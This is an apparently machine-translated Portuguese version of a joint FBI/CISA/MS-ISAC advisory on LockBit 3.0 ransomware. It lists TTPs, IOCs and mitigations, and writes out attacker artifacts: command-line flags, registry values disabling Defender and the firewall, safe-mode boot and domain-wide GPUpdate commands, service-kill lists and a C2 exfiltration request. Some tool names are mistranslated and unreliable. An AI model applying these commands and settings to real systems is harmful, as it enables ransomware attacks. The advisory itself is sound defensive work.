RESUMO
Observação: este comunicado conjunto sobre segurança cibernética (CSA) faz parte de um esforço contínuo #StopRansomware para publicar avisos para defensores de rede que detalham variantes de ransomware e agentes de ameaças de ransomware. Esses alertas #StopRansomware incluem táticas, técnicas e procedimentos (TTPs) observados recentemente e historicamente e indicadores de comprometimento (IOCs) para ajudar as organizações a se protegerem contra ransomware. Visite stopransomware.gov para ver todos os avisos #StopRansomware e saber mais sobre outras ameaças de ransomware e recursos gratuitos.
Ações a serem tomadas hoje para mitigar ameaças cibernéticas de ransomware:
- Priorize a correção de vulnerabilidades exploradas conhecidas.
- Treine os usuários para reconhecer e relatar tentativas de phishing.
- Habilite e reforce a autenticação multifator resistente a phishing.
O Federal Bureau of Investigation (FBI), a Cybersecurity and Infrastructure Security Agency (CISA) e o Multi-State Information Sharing & Analysis Center (MS-ISAC) estão lançando este CSA conjunto para disseminar IOCs e TTPs de ransomware LockBit 3.0 conhecidos identificados por meio de Investigações do FBI em março de 2023.
As operações do ransomware LockBit 3.0 funcionam como um modelo Ransomware-as-a-Service (RaaS) e são uma continuação das versões anteriores do ransomware, LockBit 2.0 e LockBit. Desde janeiro de 2020, o LockBit funciona como uma variante de ransomware baseada em afiliado; os afiliados que implantam o LockBit RaaS usam muitos TTPs variados e atacam uma ampla gama de empresas e organizações de infraestrutura crítica, o que pode tornar a defesa e a mitigação eficazes da rede de computadores um desafio.
O FBI, a CISA e o MS-ISAC incentivam as organizações a implementar as recomendações na seção de mitigação deste CSA para reduzir a probabilidade e o impacto de incidentes de ransomware.
Baixe a versão em PDF deste relatório:
DETALHES TÉCNICOS
Observação: este comunicado usa a estrutura MITRE ATT&CK® para empresas, versão 12. Consulte a seção Táticas e técnicas do MITRE ATT&CK para obter uma tabela das atividades dos agentes de ameaças mapeadas para o MITRE ATT&CK para empresas.
CAPACIDADES
O LockBit 3.0, também conhecido como “LockBit Black”, é mais modular e evasivo do que suas versões anteriores e compartilha semelhanças com Blackmatter e Blackcat ransomware.
O LockBit 3.0 é configurado na compilação com muitas opções diferentes que determinam o comportamento do ransomware. Após a execução real do ransomware em um ambiente de vítima, vários argumentos podem ser fornecidos para modificar ainda mais o comportamento do ransomware. Por exemplo, o LockBit 3.0 aceita argumentos adicionais para operações específicas em movimento lateral e reinicialização no modo de segurança (consulte os parâmetros da linha de comando do LockBit em Indicadores de comprometimento). Se um afiliado do LockBit não tiver acesso ao ransomware LockBit 3.0 sem senha, um argumento de senha será obrigatório durante a execução do ransomware. Os afiliados do LockBit 3.0 que não inserirem a senha correta não poderão executar o ransomware [ T1480.001]. A senha é uma chave criptográfica que decodifica o executável LockBit 3.0. Ao proteger o código dessa maneira, o LockBit 3.0 dificulta a detecção e análise de malware, sendo o código inexecutável e ilegível em seu formato criptografado. As detecções baseadas em assinatura podem falhar ao detectar o executável LockBit 3.0, pois a poção criptografada do executável varia de acordo com a chave criptográfica usada para criptografia, ao mesmo tempo em que gera um hash exclusivo. Quando fornecida a senha correta, o LockBit 3.0 irá descriptografar o componente principal, continuar a descriptografar ou descompactar seu código e executar o ransomware.
O LockBit 3.0 infectará apenas máquinas que não tenham configurações de idioma correspondentes a uma lista de exclusão definida. No entanto, se um idioma do sistema é verificado no tempo de execução é determinado por um sinalizador de configuração definido originalmente no tempo de compilação. Os idiomas na lista de exclusão incluem, entre outros, romeno (Moldávia), árabe (Síria) e tártaro (Rússia). Se um idioma da lista de exclusão for detectado [ T1614.001 ], o LockBit 3.0 interromperá a execução sem infectar o sistema.
ACESSO INICIAL
Os afiliados que implantam o ransomware LockBit 3.0 obtêm acesso inicial às redes das vítimas por meio da exploração do protocolo de área de trabalho remota (RDP) [ T1133 ], comprometimento de passagem [ T1189 ], campanhas de phishing [ T1566 ], abuso de contas válidas [ T1078 ] e exploração de aplicações de frente [ T1190 ].
PROCESSO DE EXECUÇÃO E INFECÇÃO
Durante a rotina de malware, se os privilégios não forem suficientes, o LockBit 3.0 tenta escalar para os privilégios necessários [ TA0004 ]. O LockBit 3.0 executa funções como:
- Enumerar informações do sistema, como nome do host, configuração do host, informações do domínio, configuração da unidade local, compartilhamentos remotos e dispositivos de armazenamento externos montados [ T1082 ]
- Encerramento de processos e serviços [ T1489 ]
- Lançamento de comandos [ TA0002 ]
- Habilitando logon automático para persistência e escalonamento de privilégios [ T1547 ]
- Exclusão de arquivos de log, arquivos na pasta da lixeira e cópias de sombra residentes no disco [ T1485 ], [ T1490 ]
O LockBit 3.0 tenta se espalhar por uma rede de vítimas usando uma lista pré-configurada de credenciais codificadas no momento da compilação ou uma conta local comprometida com privilégios elevados [ T1078 ]. Quando compilado, o LockBit 3.0 também pode habilitar opções para propagação via Objetos de Diretiva de Grupo e PsExec usando o protocolo Server Message Block (SMB). O LockBit 3.0 tenta criptografar os dados [ T1486 ] salvos em qualquer dispositivo local ou remoto, mas ignora os arquivos associados às principais funções do sistema.
Depois que os arquivos são criptografados, o LockBit 3.0 lança uma nota de resgate com o novo nome de arquivo <Ransomware ID>.README.txt e altera o papel de parede e os ícones do host para a marca LockBit 3.0 [ T1491.001 ]. Se necessário, o LockBit 3.0 enviará informações criptografadas de host e bot para um servidor de comando e controle (C2) [ T1027 ].
Depois de concluído, o LockBit 3.0 pode excluir a si mesmo do disco [ T1070.004 ], bem como quaisquer atualizações de Diretiva de Grupo feitas, dependendo de quais opções foram definidas no momento da compilação.
EXFILTRAÇÃO
Os afiliados do LockBit 3.0 usam Stealbit, uma ferramenta de exfiltração personalizada usada anteriormente com o LockBit 2.0 [ TA0010 ]; rclone, um gerenciador de armazenamento em nuvem de linha de comando de código aberto [ T1567.002 ]; e serviços de compartilhamento de arquivos publicamente disponíveis, como MEGA [ T1567.002 ], para exfiltrar arquivos de dados confidenciais da empresa antes da criptografia. Embora o rclone e muitos serviços de compartilhamento de arquivos publicamente disponíveis sejam usados principalmente para fins legítimos, eles também podem ser usados por agentes de ameaças para ajudar no comprometimento do sistema, exploração de rede ou exfiltração de dados. Os afiliados do LockBit 3.0 geralmente usam outros serviços de compartilhamento de arquivos disponíveis publicamente para exfiltrar dados também [ T1567 ] (consulte a Tabela 1).
Site de compartilhamento de arquivos |
---|
https://www.premiumize[.]com |
https://anonfiles[.]com |
https://www.sendspace[.]com |
https://fex[.]net |
https://transfer[.]sh |
https://send.exploit[.]in |
APROVEITANDO FERRAMENTAS GRATUITAS E DE CÓDIGO ABERTO
Os afiliados do LockBit foram observados usando várias ferramentas freeware e de código aberto durante suas invasões. Essas ferramentas são usadas para uma variedade de atividades, como reconhecimento de rede, acesso remoto e tunelamento, despejo de credenciais e exfiltração de arquivos. O uso de scripts PowerShell e Batch é observado na maioria das invasões, que se concentram na descoberta do sistema, reconhecimento, busca de senha/credencial e escalonamento de privilégios. Artefatos de ferramentas profissionais de teste de penetração, como Metasploit e Cobalt Strike, também foram observados. Consulte a Tabela 2 para obter uma lista de freeware legítimo e ferramentas de código aberto que os afiliados da LockBit reaproveitaram para operações de ransomware:
Ferramenta | Descrição | ID MITRE ATT&CK |
---|---|---|
achocolatado | Gerenciador de pacotes de linha de comando para Windows. | T1072 |
FileZillaName | Aplicativo de protocolo de transferência de arquivo (FTP) de plataforma cruzada. | T1071.002 |
Empacote | Coleção de classes Python para trabalhar com protocolos de rede. | S0357 |
MEGA Ltda MegaSync | Ferramenta de sincronização baseada em nuvem. | T1567.002 |
Microsoft Sysinternals ProcDump | Gera despejos de memória. Comumente usado para despejar o conteúdo do Serviço de Subsistema da Autoridade de Segurança Local, LSASS.exe. | T1003.001 |
Microsoft Sysinternals PsExec | Execute um processo de linha de comando em uma máquina remota. | S0029 |
Mimikatz | Extrai credenciais do sistema. | S0002 |
Ngrok | Ferramenta legítima de acesso remoto abusada para contornar as proteções da rede da vítima. | S0508 |
Link do PuTTY (Plink) | Pode ser usado para automatizar ações Secure Shell (SSH) no Windows. | T1572 |
Rclone | Programa de linha de comando para gerenciar arquivos de armazenamento em nuvem | S1040 |
Scanner de Rede SoftPerfect | Executa varreduras de rede. | T1046 |
Splashtop | Software de área de trabalho remota. | T1021.001 |
WinSCPGenericName | Cliente SSH File Transfer Protocol para Windows. | T1048 |
INDICADORES DE COMPROMISSO (IOCS)
As características de IOCs e malware descritas abaixo foram derivadas da análise de campo. As amostras a seguir estão atualizadas em março de 2023.
LockBit 3.0 Ícone Preto
Papel de parede do LockBit 3.0
Parâmetros de linha de comando LockBit
Parâmetros LockBit | Descrição |
---|---|
-del |
Auto-excluir. |
-gdel |
Remova as alterações da política de grupo LockBit 3.0. |
-gspd |
Espalhe lateralmente através da política de grupo. |
-pass (valor de 32 caracteres) |
(Obrigatório) Senha usada para iniciar o LockBit 3.0. |
-path (arquivo ou caminho) |
Criptografa apenas o arquivo ou pasta fornecida. |
-psex |
Espalhe lateralmente por meio de compartilhamentos administrativos. |
-safe |
Reinicie o host no modo de segurança. |
-wall |
Define o papel de parede do LockBit 3.0 e imprime a nota de resgate do LockBit 3.0. |
OBJETO DE EXCLUSÃO MÚTUA (MUTEX) CRIADO
Quando executado, o LockBit 3.0 criará o mutex Global\<MD4 hash of machine GUID>
e verificará se esse mutex já foi criado para evitar a execução de mais de uma instância do ransomware.
IGNORAR UAC VIA INTERFACE COM ELEVADA
O LockBit 3.0 é capaz de ignorar o Controle de Conta de Usuário (UAC) para executar código com privilégios elevados por meio da interface COM (Component Object Model) elevada. C:\Windows\System32\dllhost.exe é gerado com alta integridade com a linha de comando GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC .
Por exemplo, %SYSTEM32%\dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.
EXCLUSÃO DE CÓPIA DE SOMBRA DE VOLUME
LockBit 3.0 usa Windows Management Instrumentation (WMI) para identificar e excluir cópias de sombra de volume. O LockBit 3.0 usa select * de Win32_ShadowCopy para consultar cópias de sombra de volume, Win32_ShadowCopy.ID para obter o ID da cópia de sombra e DeleteInstance para excluir quaisquer cópias de sombra.
ARTEFATOS DE REGISTRO
Ícone LockBit 3.0
Chave do registro | Valor | Dados |
---|---|---|
HKCR\. <Extensão de malware> |
(Default) |
<Extensão de malware> |
HKCR\< Extensão de Malware>\DefaultIcon |
(Default) |
C:\ProgramData\<Mal ware Extension>.ico |
Papel de parede do LockBit 3.0
Chave do registro | Valor | Dados |
---|---|---|
HKCU\Control Panel\Desktop\WallPaper |
(Default) |
C:\ProgramData\<Mal ware Extension>.bmp |
Desativar experiência de configurações de privacidade
Chave do registro | Valor | Dados |
---|---|---|
SOFTWARE\Policies\Microsoft\Windows\OOBE |
DisablePrivacyE xperience |
0 |
Ativar logon automático
Chave do registro | Valor | Dados |
---|---|---|
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
AutoAdminLogon |
1 |
DefaultUserName |
<username> |
|
DefaultDomainNa me |
<username> |
|
DefaultPassword |
<password> |
Desativar e limpar logs de eventos do Windows
Chave do registro | Valor | Dados |
---|---|---|
HKLM\SOFTWARE\Microsoft\Windows \CurrentVersion\WINEVT\Channels \* |
Enabled |
0 |
HKLM\SOFTWARE\Microsoft\Windows \CurrentVersion\WINEVT\Channels \* \ChannelAccess |
ChannelAccess |
AO:BAG:SYD:(A;;0x1;; ;SY)(A;;0x5;;;BA)(A; ;0x1;;;LA) |
LOCAIS DE RESGATE
Locais de caminho de arquivo LockBit 3.0 |
---|
ADMIN$\Temp\<LockBit3.0 Filename>.exe |
%SystemRoot%\Temp\<LockBit3.0 Filename>.exe |
\<Domain Name>\sysvol\<Domain Name>\scripts\ <Lockbit 3.0 Filename>.exe (Domain Controller) |
COMANDOS DE LANÇAMENTO DO MODO DE SEGURANÇA
O LockBit 3.0 possui um recurso de modo de segurança para contornar o antivírus e a detecção de endpoint. Dependendo do sistema operacional do host, o seguinte comando é iniciado para reinicializar o sistema no modo de segurança com rede:
Sistema operacional | Modo de segurança com comando de rede |
---|---|
Vista and newer |
bcdedit /set {current} safeboot network |
Pre-Vista |
bootcfg /raw /a /safeboot:network /id 1 |
Sistema operacional | Desativar a reinicialização do modo de segurança |
---|---|
Vista and newer |
bcdedit /deletevalue {current} safeboot |
Pre-Vista |
bootcfg /raw /fastdetect /id 1 |
ARTEFATOS DA POLÍTICA DE GRUPO
A seguir estão os arquivos XML (Extensible Markup Language) da Diretiva de Grupo identificados após uma infecção por LockBit 3.0:
NetworkShares.xml |
---|
<?xml version=”1.0″ encoding=”utf-8″?> <NetworkShareSettings clsid=”{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}”> <NetShare clsid=”{2888C5E7-94FC-4739-90AA-2C1536D68BC0 }” image=”2″ name=”%%ComputerName%%_D” alterado=”%s” uid=”%s”> < Properties action=”U” name=”%%ComputerName%%_D” path=” D:” comment=”” allRegular=”0″ allHidden=”0″ allAdminDrive=”0″ limitUsers=”NO_CHANGE” abe=”NO_CHANGE”/> |
O Services.xml interrompe e desativa os serviços nos hosts do Active Directory (AD).
Services.xml |
---|
<?xml version=”1.0″ encoding=”utf-8″?> <NTServices clsid=”{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}”> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43 }” name=”SQLPBDMS” image=”4″ change=”%s” uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”SQLPBDMS” serviceAction=”STOP” timeout=” 30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SQLPBENGINE” image=”4″ change=”%s” uid=”%s” disabled=” 0″> <Properties startupType=”DISABLED” serviceName=”SQLPBENGINE” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”MSSQLFDLauncher” image=”4″ change=”%s” uid=”%s” userContext=”0″ removePolicy=”0″ disabled=”0″> <Propriedades startupType=”DISABLED” serviceName=”MSSQLFDLauncher ” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SQLSERVERAGENT” image=”4″ change=”%s” uid =”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”SQLSERVERAGENT” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{ AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”MSSQLServerOLAPService” image=”4″ alterado=”%s” uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=” MSSQLServerOLAPService” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SSASTELEMETRY” image=”4″ change=”%s” uid=”%s” disabled=”0″> < Propriedades startupType=”DISABLED” serviceName=”SSASTELEMETRY” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SQLBrowser” imagem =”4″ alterado=”%s” uid=”%s” desativado=”0″> <Propriedades startupType=”DISABLED” serviceName=”SQLBrowser” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SQL Server Distributed Replay Client” image=”4″ change=”%s” uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”SQL Server Distributed Replay Client” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” nome =”Controlador de Replay Distribuído do SQL Server” image=”4″ alterado=”%s” uid=”%s” disabled=”0″> <Propriedades startupType=”DISABLED” serviceName=”Controlador de Replay Distribuído do SQL Server” serviceAction= ” STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”MsDtsServer150″ image=”4″ alterado=”%s”uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”MsDtsServer150″ serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SSISTELEMETRY150″ image=”4″ change=”%s” uid=”%s” disabled=”0″> <Properties startupType=” DESATIVADO” serviceName=”SSISTELEMETRY150″ serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SSISScaleOutMaster150″ image=”4″ change=”%s” uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”SSISScaleOutMaster150″ serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F- 4e51-92F9-005FBFBA1A43}” name=”SSISScaleOutWorker150″ image=”4″ alterado=”%s” uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”SSISScaleOutWorker150″ serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”MSSQLLaunchpad” image=”4″ change=”%s” uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”MSSQLLaunchpad” serviceAction=”STOP” timeout=”30″/> < /NTService > <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SQLWriter” image=”4″ alterado=”%s” uid=”%s” disabled=”0″> <Propriedades startupType=”DISABLED” serviceName=”SQLWriter” serviceAction=”STOP” timeout=”30″/> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”SQLTELEMETRY” image=”4″ change=”%s” uid=”%s” disabled=”0″> <Properties startupType=”DISABLED” serviceName=”SQLTELEMETRY” serviceAction=”STOP” timeout=”30″ /> </NTService> <NTService clsid=”{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}” name=”MSSQLSERVER” image=”4″ alterado=”%s” uid=”%s” disabled=”0″ > <Properties startupType=”DISABLED” serviceName=”MSSQLSERVER” serviceAction=”STOP” timeout=”60″/> </NTService> </NTServices> |
REGISTRY.POL
A configuração do registro a seguir altera os valores para o tempo de atualização da Política de Grupo, desativa o SmartScreen e desativa o Windows Defender.
Chave do registro | Valor do registro | Tipo de valor | Dados |
---|---|---|---|
HKLM\SOFTWARE\Policies\Microsoft\Window s\System |
GroupPolicyRefresh TimeDC |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s\System |
GroupPolicyRefresh TimeOffsetDC |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s\System |
GroupPolicyRefresh Time |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s\System |
GroupPolicyRefresh TimeOffset |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s\System |
EnableSmartScreen |
REG_D WORD |
0 |
HKLM\SOFTWARE\Policies\Microsoft\Window s\System |
**del.ShellSmartSc reenLevel |
REG_S Z |
|
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender |
DisableAntiSpyware |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender |
DisableRoutinelyTa kingAction |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Real-Time Protection |
DisableRealtimeMon itoring |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Real-Time Protection |
DisableBehaviorMon itoring |
REG_D WORD |
1 |
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Spynet |
SubmitSamplesConse nt |
REG_D WORD |
2 |
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Spynet |
SpynetReporting |
REG_D WORD |
0 |
HKLM\SOFTWARE\Policies\Microsoft\Window sFirewall\DomainProfile |
EnableFirewall |
REG_D WORD |
0 |
HKLM\SOFTWARE\Policies\Microsoft\Window sFirewall\StandardProfile |
EnableFirewall |
REG_D WORD |
0 |
FORÇAR ATUALIZAÇÃO DE GPU
Depois que novas políticas de grupo são adicionadas, um comando do PowerShell usando atualização de política de grupo (GPUpdate) aplica as novas alterações de política de grupo a todos os computadores no domínio AD.
Forçar GPUpdate Comando Powershell |
---|
powershell Get-ADComputer -filter * -Searchbase ‘%s’ | Foreach-Object { Invoke- GPUpdate -computer $_.name -force -RandomDelayInMinutes 0} |
SERVIÇOS ELIMINADOS
vss | sql | svc$ |
memtas | mepocs | msexchange |
sophos | veeam | backup |
GxVss | GxBlr | GxFWD |
GxCVD | GxCIMgr |
PROCESSOS ENCERRADOS
sql | oracle | ocssd |
dbsnmp | synctime | agntsvc |
isqlplussvc | xfssvccon | mydesktopservice |
ocautoupds | encsvc | firefox |
tbirdconfig | mydesktopqos | ocomm |
dbeng50 | sqbcoreservice | excel |
infopath | msaccess | mspu |
onenote | outlook | powerpnt |
steam | thebat | thunderbird |
visio | winword | wordpad |
notepad |
LOCKBIT 3.0 RANSOM NOTE
NOTA DE RESGATE LOCKBIT 3.0
~~~ LockBit 3.0, o ransomware mais rápido e estável do mundo desde 2019~~~
>>>>> Seus dados são roubados e criptografados.
Se você não pagar o resgate, os dados serão publicados em nossos sites TOR darknet. Lembre-se de que, uma vez que seus dados apareçam em nosso site de vazamento, eles podem ser comprados por seus concorrentes a qualquer segundo, portanto, não hesite por muito tempo. Quanto mais cedo você pagar o resgate, mais cedo sua empresa estará segura.
CONEXÕES DE REDE
Se configurado, o Lockbit 3.0 enviará duas solicitações HTTP POST para um dos servidores C2. As informações sobre o host e o bot da vítima são criptografadas com uma chave AES (Advanced Encryption Standard) e codificadas em Base64.
Example of HTTP POST request POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate, br Content-Type: text/plain User-Agent: Safari/537.36 <Lockbit User Agent String> Host: <Lockbit C2> Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl Example of information found in encrypted data { "bot_version":"X", "bot_id":"X", "bot_company":"X", "host_hostname":"X", "host_user":"X", "host_os":"X", "host_domain":"X", "host_arch":"X", "host_lang":"X", "disks_info":[ { "disk_name":"X", "disk_size":"XXXX", "free_size":"XXXXX" } |
USER AGENT STRINGS
Mozilla/5.0 (Windows NT 6.1) |
AppleWebKit/587.38 (KHTML, like Gecko) |
Chrome/91.0.4472.77 |
Safari/537.36 | Edge/91.0.864.37 | Firefox/89.0 |
Gecko/20100101 |
TÉCNICAS MITRE ATT&CK
Consulte a Tabela 3 para todas as táticas e técnicas de agentes de ameaças referenciadas neste comunicado. Para obter assistência com o mapeamento para a estrutura MITRE ATT&CK, consulte a ferramenta Decider e as melhores práticas da CISA para o guia de mapeamento MITRE ATT&CK.
Acesso inicial | ||
---|---|---|
Título da Técnica | EU IA | Usar |
Contas válidas | T1078 | Os atores do LockBit 3.0 obtêm e abusam das credenciais de contas existentes como meio de obter acesso inicial. |
Explorar serviços remotos externos | T1133 | Os agentes do LockBit 3.0 exploram o RDP para obter acesso às redes das vítimas. |
Compromisso Drive-by | T1189 | Os atores do LockBit 3.0 obtêm acesso a um sistema por meio de um usuário que visita um site durante o curso normal da navegação. |
Explorar aplicativo voltado para o público | T1190 | Os atores do LockBit 3.0 exploram vulnerabilidades em sistemas voltados para a Internet para obter acesso aos sistemas das vítimas. |
Phishing | T1566 | Os atores do LockBit 3.0 usam phishing e spearphishing para obter acesso às redes das vítimas. |
Execução | ||
Título da Técnica | EU IA | Usar |
Execução | TA0002 | O LockBit 3.0 lança comandos durante sua execução. |
Ferramentas de implantação de software | T1072 | LockBit 3.0 usa Chocolatey, um gerenciador de pacotes de linha de comando para Windows. |
Persistência | ||
Título da Técnica | EU IA | Usar |
Contas válidas | T1078 | O LockBit 3.0 usa uma conta de usuário comprometida para manter a persistência na rede de destino. |
Execução de inicialização automática de inicialização ou logotipo | T1547 | LockBit 3.0 permite logon automático para persistência. |
Escalação de Privilégios | ||
Título da Técnica | EU IA | Usar |
Escalação de Privilégios | TA0004 | O Lockbit 3.0 tentará escalar para os privilégios necessários se os privilégios da conta atual forem insuficientes. |
Execução de inicialização automática de inicialização ou logotipo | T1547 | O LockBit 3.0 permite logon automático para escalonamento de privilégios. |
Defesa Evasão | ||
Título da Técnica | EU IA | Usar |
Arquivos ou informações ofuscadas | T1027 | O LockBit 3.0 enviará informações criptografadas de host e bot para seus servidores C2. |
Remoção do Indicador: Exclusão de Arquivo | T1070.004 | O LockBit 3.0 se excluirá do disco. |
Guarda-corpos de Execução: Codificação Ambiental | T1480.001 | O LockBit 3.0 só descriptografará o componente principal ou continuará a descriptografar e/ou descompactar dados se a senha correta for inserida. |
Acesso à credencial | ||
Título da Técnica | EU IA | Usar |
Despejo de credenciais do sistema operacional: memória LSASS | T1003.001 | O LockBit 3.0 usa o Microsoft Sysinternals ProDump para despejar o conteúdo de LSASS.exe. |
Descoberta | ||
Título da Técnica | EU IA | Usar |
Descoberta de serviço de rede | T1046 | O LockBit 3.0 usa o SoftPerfect Network Scanner para escanear as redes de destino. |
Descoberta de informações do sistema | T1082 | O LockBit 3.0 enumerará as informações do sistema para incluir nome do host, configuração do host, informações do domínio, configuração da unidade local, compartilhamentos remotos e dispositivos de armazenamento externos montados. |
Descoberta de localização do sistema: Descoberta de idioma do sistema | T1614.001 | O LockBit 3.0 não infectará máquinas com configurações de idioma que correspondam a uma lista de exclusão definida. |
Movimento lateral | ||
Título da Técnica | EU IA | Usar |
Serviços Remotos: Protocolo de Área de Trabalho Remota | T1021.001 | O LockBit 3.0 usa o software de área de trabalho remota Splashtop para facilitar o movimento lateral. |
Comando e controle | ||
Título da Técnica | EU IA | Usar |
Protocolo da Camada de Aplicação: Protocolos de Transferência de Arquivos | T1071.002 | LockBit 3.0 usa FileZilla para C2. |
túnel de protocolo | T1572 | LockBit 3.0 usa Plink para automatizar ações SSH no Windows. |
Exfiltração | ||
Título da Técnica | EU IA | Usar |
Exfiltração | TA0010 | O LockBit 3.0 usa Stealbit, uma ferramenta de exfiltração personalizada usada pela primeira vez com o LockBit 2.0, para roubar dados de uma rede de destino. |
Exfiltração por serviço da Web | T1567 | O LockBit 3.0 usa serviços de compartilhamento de arquivos publicamente disponíveis para exfiltrar os dados de um alvo. |
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Os agentes do LockBit 3.0 usam (1) rclone, um gerenciador de armazenamento em nuvem de linha de comando de código aberto para exfiltrar e (2) MEGA, um serviço de compartilhamento de arquivos disponível publicamente para exfiltração de dados. |
Impacto | ||
Título da Técnica | EU IA | Usar |
Destruição de Dados | T1485 | LockBit 3.0 exclui arquivos de log e esvazia a lixeira. |
Dados criptografados para impacto | T1486 | O LockBit 3.0 criptografa os dados nos sistemas de destino para interromper a disponibilidade dos recursos do sistema e da rede. |
Parada de Serviço | T1489 | LockBit 3.0 encerra processos e serviços. |
Inibir Recuperação do Sistema | T1490 | O LockBit 3.0 exclui as cópias de sombra de volume que residem no disco. |
Desfiguração: Desfiguração interna | T1491.001 | O LockBit 3.0 altera o papel de parede e os ícones do sistema host para o papel de parede e os ícones do LockBit 3.0, respectivamente. |
MITIGAÇÕES
O FBI, CISA e MS-ISAC recomendam que as organizações implementem as mitigações abaixo para melhorar a postura de segurança cibernética de sua organização com base na atividade do LockBit 3.0. Essas mitigações se alinham com as metas de desempenho de segurança cibernética (CPGs) intersetoriais desenvolvidas pela CISA e pelo Instituto Nacional de Padrões e Tecnologia (NIST). Os CPGs fornecem um conjunto mínimo de práticas e proteções que a CISA e o NIST recomendam que todas as organizações implementem. A CISA e o NIST basearam os CPGs em estruturas e orientações de segurança cibernética existentes para proteção contra os TTPs mais comuns e impactantes. Visite as metas de desempenho de segurança cibernética entre setores da CISA para obter mais informações sobre os CPGs, incluindo proteções de linha de base adicionais recomendadas.
- Implemente um plano de recuperação para manter e reter várias cópias de dados confidenciais ou proprietários e servidores [ CPG 7.3 ] em um local fisicamente separado, segmentado e seguro (por exemplo, disco rígido, dispositivo de armazenamento, nuvem).
- Exigir que todas as contas com logins de senha (por exemplo, conta de serviço, contas de administrador e contas de administrador de domínio) cumpram os padrões do Instituto Nacional de Padrões e Tecnologia (NIST) para desenvolver e gerenciar políticas de senha [ CPG 3.4 ].
- Use senhas mais longas, com no mínimo 8 caracteres e no máximo 64 caracteres [ CPG 1.4 ]
- Armazene senhas em formato hash usando gerenciadores de senhas reconhecidos pelo setor
- Adicione a senha do usuário “salts” às credenciais de login compartilhadas
- Evite reutilizar senhas
- Implementar vários bloqueios de conta de tentativa de login com falha [ CPG 1.1 ]
- Desabilitar “dicas” de senha
- Evite exigir alterações de senha com mais frequência do que uma vez por ano. Observação: a orientação do NIST sugere favorecer senhas mais longas em vez de exigir redefinições de senha regulares e frequentes. Redefinições frequentes de senha têm maior probabilidade de resultar em usuários desenvolvendo “padrões” de senha que os criminosos cibernéticos podem decifrar facilmente.
- Exigir credenciais de administrador para instalar o software
- Exigir autenticação multifator resistente a phishing [ CPG 1.3 ] para todos os serviços na medida do possível, especialmente para webmail, redes privadas virtuais e contas que acessam sistemas críticos.
